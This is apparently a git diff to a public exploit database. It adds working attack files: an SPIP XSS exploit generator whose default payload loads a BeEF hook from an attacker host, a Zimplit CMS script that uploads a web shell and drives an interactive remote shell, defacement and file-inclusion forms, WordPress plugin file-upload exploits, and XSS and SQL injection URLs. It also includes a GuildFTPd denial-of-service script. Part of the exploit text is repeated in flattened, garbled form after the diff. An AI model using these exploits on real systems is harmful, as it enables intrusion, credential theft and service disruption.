diff --git a/files.csv b/files.csv
index 3a2fb88d4..27561d762 100755
--- a/files.csv
+++ b/files.csv
@@ -6303,7 +6303,7 @@ id,file,description,date,author,platform,type,port
 6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0
 6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 (index.php cat) SQL Injection Vulnerability",2008-10-12,Hakxer,php,webapps,0
 6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0
-6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0
+6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0
 6739,platforms/php/webapps/6739.txt,"NewLife Blogger <= 3.0 Insecure Cookie Handling / SQL Injection Vuln",2008-10-12,Pepelux,php,webapps,0
 6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 (index.php) Local File Download Vulnerability",2008-10-12,JosS,php,webapps,0
 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service Exploit",2008-10-13,shinnai,windows,dos,0
@@ -33747,3 +33747,9 @@ id,file,description,date,author,platform,type,port
 37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0
 37394,platforms/multiple/webapps/37394.txt,"Thycotic Secret Server 8.8.000004 - Stored XSS",2015-06-26,"Marco Delai",multiple,webapps,0
 37395,platforms/windows/webapps/37395.txt,"ManageEngine Asset Explorer 6.1 - Stored XSS",2015-06-26,"Suraj Krishnaswami",windows,webapps,0
+37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-06-13,Sangteamtham,windows,remote,0
+37397,platforms/php/webapps/37397.html,"SPIP 2.x Multiple Cross Site Scripting Vulnerabilities",2012-06-13,anonymous,php,webapps,0
+37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 Local File Include and Arbitrary File Upload Vulnerabilities",2012-06-13,KedAns-Dz,php,webapps,0
+37399,platforms/php/webapps/37399.php,"WordPress Evarisk Plugin 'uploadPhotoApres.php' Arbitrary File Upload Vulnerability",2012-01-14,"Sammy FORGIT",php,webapps,0
+37403,platforms/php/webapps/37403.php,"WordPress Invit0r Plugin 'ofc_upload_image.php' Arbitrary File Upload Vulnerability",2012-06-14,"Sammy FORGIT",php,webapps,0
+37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x 'uselang' Parameter Cross Site Scripting Vulnerability",2012-06-17,anonymous,php,webapps,0
diff --git a/platforms/php/webapps/37397.html b/platforms/php/webapps/37397.html
new file mode 100755
index 000000000..da7f4cf8d
--- /dev/null
+++ b/platforms/php/webapps/37397.html
@@ -0,0 +1,87 @@
+source: http://www.securityfocus.com/bid/53983/info
+
+SPIP is prone to multiple unspecified cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Versions prior to SPIP 2.0.20, 2.1.15, and 3.0.2 are vulnerable. 
+
+Exploit generator:
+------------------
+<html>
+<head>
+  <script>
+    function trim(s){
+      return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
+    }
+    
+    function encodeToHex(s){
+      var r="";
+      var h;
+      for(var c=0;c<s.length;c++){
+        h=s.charCodeAt(c).toString(16);
+        while(h.length<3) h="%"+h;
+        r+=h;
+      }
+      return r;
+    }
+
+    function generateXSS(){
+      var target  = trim(document.getElementById("target").value);
+      var version = trim(document.getElementById("version").value);
+      var content = trim(document.getElementById("content").value);
+      var resultjs = "";
+      resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>";
+      resultjs += "<input type='hidden' name='exec' value='" + version + "' />";
+      resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />";
+      resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
+      document.getElementById("resultjs").value = resultjs;
+    }
+   
+  </script>
+</head>
+<body onload="generateXSS();">
+  <h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2>
+  <p>
+  This XSS, non-persistent, use POST vars through admin panel.<br />
+  The target is the attribute "name" of an input markup hidden.<br />
+  This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br />
+  Magic_quote_gcp = Off needed.
+  </p>
+  <form action="" onsubmit="generateXSS();return false;">
+    <table>
+      <tr>
+        <td>URL's SPIP Targeted :</td>
+        <td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td>
+      </tr>
+      <tr>
+        <td>SPIP version :</td>
+        <td>
+          <select id="version" onchange="generateXSS();">
+            <option value="base_repair">3.0.X (up to 3.0.1 included)</option>
+            <option value="admin_repair">2.1.X (up to 2.1.14 included)</option>
+          </select>
+        </td>
+      </tr>
+      <tr>
+        <td>JavaScript code to execute :<br />(without <script> & </script> markup)</td>
+        <td>
+          <textarea cols="70" rows="10" id="content" onkeyup="generateXSS();">
+alert(document.cookie);
+var script = document.createElement("script");
+script.type = "text/javascript";
+script.src = "http://ha.ck.er.xxx/beEf.js";
+document.body.appendChild(script);
+          &lt;/textarea&gt;
+        </td>
+      </tr>
+      <tr>
+        <td>Exploit to send to an admin : </td>
+        <td>
+          <textarea cols="70" rows="10" id="resultjs" readonly="readonly">&lt;/textarea&gt;
+        </td> 
+      </tr>
+    </table>
+  </form>
+</body>
+</html>
diff --git a/platforms/php/webapps/37398.php b/platforms/php/webapps/37398.php
new file mode 100755
index 000000000..8c1d68c32
--- /dev/null
+++ b/platforms/php/webapps/37398.php
@@ -0,0 +1,191 @@
+source: http://www.securityfocus.com/bid/53990/info
+
+Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability.
+
+An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
+
+Zimplit CMS 3.0 is vulnerable; other versions may also be affected. 
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : 1337day.com                                   0
+1  [+] Support e-mail  : submit[at]1337day.com                         1
+0                                                                      0
+1               #########################################              1
+0               I'm KedAns-Dz member from Inj3ct0r Team                1
+1               #########################################              0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+###
+# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities
+# Author : KedAns-Dz
+# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
+# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
+# Web Site : www.1337day.com | www.inj3ct0rs.com
+# FaCeb0ok : http://fb.me/Inj3ct0rK3d
+# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
+# platform : php
+# Type : Multiple Vulnerabilities
+# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En)
+# Download : [http://www.zimplit.com/order.html]
+###
+
+# <3 <3 Greetings t0 Palestine <3 <3
+
+# Exploit's / p0c's ====>
+
+##### Exp(1) Arbitrary File/Shell Upload =>
+
+<!-- p0c (1) -->
+<?php
+
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 5);
+function http_send($host, $packet)
+{
+ $sock = fsockopen($host, 80);
+ while (!$sock)
+ {
+  print "\n[-] No response from {$host}:80 Trying again...";
+  $sock = fsockopen($host, 80);
+ }
+ fputs($sock, $packet);
+ while (!feof($sock)) $resp .= fread($sock, 1024);
+ fclose($sock);
+ return $resp;
+}
+print "\n|==================================================|";
+print "\n|   Zimplit CMS v3.0 <= Arbitrary Shell Upload     |";
+print "\n|  Provided By KedAns-Dz <ked-h[at]hotmail[.]com>  |";
+print "\n|==================================================|\n";
+if ($argc < 2)
+{
+ print "\nUsage  : php $argv[0] [host] [path]";
+ print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n";
+ die();
+}
+$host = $argv[1];
+$path = $argv[2];
+$data  = "--31337\r\n";
+$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n";
+$data .= "Content-Type: application/octet-stream\r\n\r\n";
+$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
+$data .= "--31337--\r\n";
+$packet  = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Content-Length: ".strlen($data)."\r\n";
+$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n";
+$packet .= "Connection: close\r\n\r\n";
+$packet .= $data;
+preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
+if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
+else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
+define(STDIN, fopen("php://stdin", "r"));
+while(1)
+{
+ print "\n Inj3ct0rK3d-Sh3lL#";
+ $cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
+ if ($cmd != "exit")
+ {
+  $packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n";
+  $packet.= "Host: {$host}\r\n";
+  $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell
+  $packet.= "Connection: close\r\n\r\n";
+  $output = http_send($host, $packet);
+  if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
+  $shell = explode("_code_", $output);
+  print "\n{$shell[1]}";
+ }
+ else break;
+}
+?>
+
+<!-- p0c (2) -->
+<form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post">
+<input type="file" name="file" size="50"/>
+<input type="hidden" name="file" />
+<input type="submit" value="Upload Sh3ll/File !" />
+</form>
+
+[+] Access Shell http://[Target]/editor/files/k3d.php
+[+] Access Shell http://[Target]/editor/files/{ U R Shell }.*
+
+##### Exp(2) Edit HTML (index.html) File =>
+
+<form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'>
+<textarea id="html" name="html">
+<center>
+<h1> HaCked By KedAns-Dz </h1>
+</center>
+&lt;/textarea&gt;
+<input type='submit' value='Edit HTML Page'>
+</form>
+
+##### Exp(3) Add new HTML File/Page =>
+
+<form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'>
+<textarea id="html" name="html">
+<center>
+<h1> HaCked By KedAns-Dz </h1>
+</center>
+&lt;/textarea&gt;
+<input type='submit' value='Creat new HTML Page'>
+</form>
+
+##### Exp(4) Local File Include =>
+
+<!-- p0c (1) -->
+<form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'>
+<input type='submit' value='Included Local File'>
+</form>
+
+<!-- p0c (2) -->
+
+<?php
+$lfi =
+curl_init("http://[Target]/editor/zimplit_js.php");
+curl_setopt($lfi, CURLOPT_POST, true);
+curl_setopt($lfi, CURLOPT_POSTFIELDS,
+  array('lang'=>"../../../../../../../../[ LFI ]%00"));
+curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($lfi);
+curl_close($lfi);
+print "$postResult";
+?>
+
+<!-- p0c (3) -->
+
+<?php
+$lfi =
+curl_init("http://[Target]/editor/user.php");
+curl_setopt($lfi, CURLOPT_POST, true);
+curl_setopt($lfi, CURLOPT_POSTFIELDS,
+  array('lang'=>"../../../../../../../../[ LFI ]%00"));
+curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($lfi);
+curl_close($lfi);
+print "$postResult";
+?>
+
+#### << ThE|End
+
+#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
+# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
+# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
+# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
+# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
+# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
+# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
+# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
+#============================================================================================================
+
diff --git a/platforms/php/webapps/37399.php b/platforms/php/webapps/37399.php
new file mode 100755
index 000000000..c09673bcf
--- /dev/null
+++ b/platforms/php/webapps/37399.php
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/53994/info
+
+Evarisk plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Evarisk 5.1.5.4 is vulnerable; other versions may also be affected. 
+
+<?php
+
+$headers = array("Content-Type: application/octet-stream");
+
+$uploadfile="<?php phpinfo(); ?>";
+ 
+$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?qqfile=lo.php");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
diff --git a/platforms/php/webapps/37403.php b/platforms/php/webapps/37403.php
new file mode 100755
index 000000000..13b56583e
--- /dev/null
+++ b/platforms/php/webapps/37403.php
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/53995/info
+
+Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Invit0r 0.22 is vulnerable; other versions may also be affected. 
+
+ders = array("Content-Type: application/octet-stream");
+
+$uploadfile="<?php phpinfo(); ?>";
+ 
+$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php");
+curl_setopt($ch, CURLOPT_POST, true);   
+curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
diff --git a/platforms/php/webapps/37404.txt b/platforms/php/webapps/37404.txt
new file mode 100755
index 000000000..a7a6bee28
--- /dev/null
+++ b/platforms/php/webapps/37404.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53998/info
+
+MediaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MediaWiki versions prior to 1.17.5, 1.18.4, and 1.19.1 are vulnerable. 
+
+http://www.example.com/wiki/Main_Page?uselang=a%27%20onmouseover=eval(alert(1))%20e=%27 
\ No newline at end of file
diff --git a/platforms/windows/dos/6738.py b/platforms/windows/dos/6738.py
index 51747aaa3..8356a9df6 100755
--- a/platforms/windows/dos/6738.py
+++ b/platforms/windows/dos/6738.py
@@ -1,55 +1,55 @@
-# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
-# GuildFTPd URL - http://www.guildftpd.com
-# cwd/list heap corruption
-# overwrite registers in free(): ecx, edi
-#
-# (x)dmnt 2008
-# feel free to do shellcode
-# -*- coding: windows-1252 -*-
-
-import socket
-import sys, time
-
-evil_cwd = "/."*124
-evil_dir = "X"*100
-
-def help_info():
-    print ("Usage: guildd0s <host> <login> <password>\n")
-    print ("Note: anonymous is enought\n")
-
-def dos_it(hostname, username, passwd):
-    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-    try:
-        sock.connect((hostname, 21))
-    except:
-        print ("[-] Connection error!")
-        sys.exit(1)
-    r=sock.recv(1024)
-    print "[+] " + r
-    sock.send("user %s\n" %username)
-    r=sock.recv(1024)
-    sock.send("pass %s\n" %passwd)
-    r=sock.recv(1024)
-    print "[+] Send evil string"
-    sock.send("cwd %s\n" %evil_cwd)
-    r=sock.recv(1024)
-    sock.send("list %s\r\n" %evil_dir)
-    time.sleep(3)
-    sock.close()
-    print "[!] Now server d0s'ed/heap corrupted"
-
-print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[")
-print ("](x)dmnt 2008[\n\n")
-
-if len(sys.argv) <> 4:
-    help_info()
-    sys.exit(1)
-
-else:
-    hostname=sys.argv[1]
-    username=sys.argv[2]
-    passwd=sys.argv[3]
-    dos_it(hostname,username,passwd)
-    sys.exit(0)
-
-# milw0rm.com [2008-10-12]
+# GuildFTPd v0.999.8.11/v0.999.14 heap corruption PoC/DoS exploit
+# GuildFTPd URL - http://www.guildftpd.com
+# cwd/list heap corruption
+# overwrite registers in free(): ecx, edi
+#
+# (x)dmnt 2008
+# feel free to do shellcode
+# -*- coding: windows-1252 -*-
+
+import socket
+import sys, time
+
+evil_cwd = "/."*124
+evil_dir = "X"*100
+
+def help_info():
+    print ("Usage: guildd0s <host> <login> <password>\n")
+    print ("Note: anonymous is enought\n")
+
+def dos_it(hostname, username, passwd):
+    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        sock.connect((hostname, 21))
+    except:
+        print ("[-] Connection error!")
+        sys.exit(1)
+    r=sock.recv(1024)
+    print "[+] " + r
+    sock.send("user %s\n" %username)
+    r=sock.recv(1024)
+    sock.send("pass %s\n" %passwd)
+    r=sock.recv(1024)
+    print "[+] Send evil string"
+    sock.send("cwd %s\n" %evil_cwd)
+    r=sock.recv(1024)
+    sock.send("list %s\r\n" %evil_dir)
+    time.sleep(3)
+    sock.close()
+    print "[!] Now server d0s'ed/heap corrupted"
+
+print ("\n]GuildFTPd v0.999.8.11/v0.999.14 remote heap corruption PoC/DoS exploit[")
+print ("](x)dmnt 2008[\n\n")
+
+if len(sys.argv) <> 4:
+    help_info()
+    sys.exit(1)
+
+else:
+    hostname=sys.argv[1]
+    username=sys.argv[2]
+    passwd=sys.argv[3]
+    dos_it(hostname,username,passwd)
+    sys.exit(0)
+
+# milw0rm.com [2008-10-12]
diff --git a/platforms/windows/remote/37396.txt b/platforms/windows/remote/37396.txt
new file mode 100755
index 000000000..d2f059cbd
--- /dev/null
+++ b/platforms/windows/remote/37396.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/53979/info
+
+XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script>
+
+http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
+
+http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606 
\ No newline at end of file

URL's SPIP Targeted :
SPIP version :	+ +
JavaScript code to execute : (without markup)	+ +alert(document.cookie); +var script = document.createElement("script"); +script.type = "text/javascript"; +script.src = "http://ha.ck.er.xxx/beEf.js"; +document.body.appendChild(script); + </textarea> + </td> + </tr> + <tr> + <td>Exploit to send to an admin : </td> + <td> + <textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea> + </td> + </tr> + </table> + </form> +</body> +</html> diff --git a/platforms/php/webapps/37398.php b/platforms/php/webapps/37398.php new file mode 100755 index 000000000..8c1d68c32 --- /dev/null +++ b/platforms/php/webapps/37398.php @@ -0,0 +1,191 @@ +source: http://www.securityfocus.com/bid/53990/info + +Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability. + +An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. + +Zimplit CMS 3.0 is vulnerable; other versions may also be affected. + +1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 +0 _ __ __ __ 1 +1 /' \ __ /'__`\ /\ \__ /'__`\ 0 +0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 +1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 +0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 +1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 +0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 +1 \ \____/ >> Exploit database separated by exploit 0 +0 \/___/ type (local, remote, DoS, etc.) 1 +1 1 +0 [+] Site : 1337day.com 0 +1 [+] Support e-mail : submit[at]1337day.com 1 +0 0 +1 ######################################### 1 +0 I'm KedAns-Dz member from Inj3ct0r Team 1 +1 ######################################### 0 +0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 + +### +# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities +# Author : KedAns-Dz +# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) +# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) +# Web Site : www.1337day.com \| www.inj3ct0rs.com +# FaCeb0ok : http://fb.me/Inj3ct0rK3d +# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com +# platform : php +# Type : Multiple Vulnerabilities +# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En) +# Download : [http://www.zimplit.com/order.html] +### + +# <3 <3 Greetings t0 Palestine <3 <3 + +# Exploit's / p0c's ====> + +##### Exp(1) Arbitrary File/Shell Upload => + +<!-- p0c (1) --> +<?php + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 5); +function http_send($host, $packet) +{ + $sock = fsockopen($host, 80); + while (!$sock) + { + print "\n[-] No response from {$host}:80 Trying again..."; + $sock = fsockopen($host, 80); + } + fputs($sock, $packet); + while (!feof($sock)) $resp .= fread($sock, 1024); + fclose($sock); + return $resp; +} +print "\n\|==================================================\|"; +print "\n\| Zimplit CMS v3.0 <= Arbitrary Shell Upload \|"; +print "\n\| Provided By KedAns-Dz <ked-h[at]hotmail[.]com> \|"; +print "\n\|==================================================\|\n"; +if ($argc < 2) +{ + print "\nUsage : php $argv[0] [host] [path]"; + print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n"; + die(); +} +$host = $argv[1]; +$path = $argv[2]; +$data = "--31337\r\n"; +$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n"; +$data .= "Content-Type: application/octet-stream\r\n\r\n"; +$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n"; +$data .= "--31337--\r\n"; +$packet = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Content-Length: ".strlen($data)."\r\n"; +$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n"; +$packet .= "Connection: close\r\n\r\n"; +$packet .= $data; +preg_match("/OnUploadCompleted\((.),\"(.)\",\"(.)\",/i", http_send($host, $packet), $html); +if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n"); +else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n"; +define(STDIN, fopen("php://stdin", "r")); +while(1) +{ + print "\n Inj3ct0rK3d-Sh3lL#"; + $cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php + if ($cmd != "exit") + { + $packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n"; + $packet.= "Host: {$host}\r\n"; + $packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell + $packet.= "Connection: close\r\n\r\n"; + $output = http_send($host, $packet); + if (eregi("print", $output) \|\| !eregi("_code_", $output)) die("\n[-] Exploit failed...\n"); + $shell = explode("_code_", $output); + print "\n{$shell[1]}"; + } + else break; +} +?> + +<!-- p0c (2) --> +<form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post"> +<input type="file" name="file" size="50"/> +<input type="hidden" name="file" /> +<input type="submit" value="Upload Sh3ll/File !" /> +</form> + +[+] Access Shell http://[Target]/editor/files/k3d.php +[+] Access Shell http://[Target]/editor/files/{ U R Shell }. + +##### Exp(2) Edit HTML (index.html) File => + +<form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'> +<textarea id="html" name="html"> +<center> +<h1> HaCked By KedAns-Dz </h1> +</center> +</textarea> +<input type='submit' value='Edit HTML Page'> +</form> + +##### Exp(3) Add new HTML File/Page => + +<form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'> +<textarea id="html" name="html"> +<center> +<h1> HaCked By KedAns-Dz </h1> +</center> +</textarea> +<input type='submit' value='Creat new HTML Page'> +</form> + +##### Exp(4) Local File Include => + +<!-- p0c (1) --> +<form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'> +<input type='submit' value='Included Local File'> +</form> + +<!-- p0c (2) --> + +<?php +$lfi = +curl_init("http://[Target]/editor/zimplit_js.php"); +curl_setopt($lfi, CURLOPT_POST, true); +curl_setopt($lfi, CURLOPT_POSTFIELDS, + array('lang'=>"../../../../../../../../[ LFI ]%00")); +curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($lfi); +curl_close($lfi); +print "$postResult"; +?> + +<!-- p0c (3) --> + +<?php +$lfi = +curl_init("http://[Target]/editor/user.php"); +curl_setopt($lfi, CURLOPT_POST, true); +curl_setopt($lfi, CURLOPT_POSTFIELDS, + array('lang'=>"../../../../../../../../[ LFI ]%00")); +curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($lfi); +curl_close($lfi); +print "$postResult"; +?> + +#### << ThE\|End + +#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=============================================== +# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > \| Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w +# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com) +# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection +# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore +# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke +# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ +# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs +#============================================================================================================ + diff --git a/platforms/php/webapps/37399.php b/platforms/php/webapps/37399.php new file mode 100755 index 000000000..c09673bcf --- /dev/null +++ b/platforms/php/webapps/37399.php @@ -0,0 +1,24 @@ +source: http://www.securityfocus.com/bid/53994/info + +Evarisk plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this 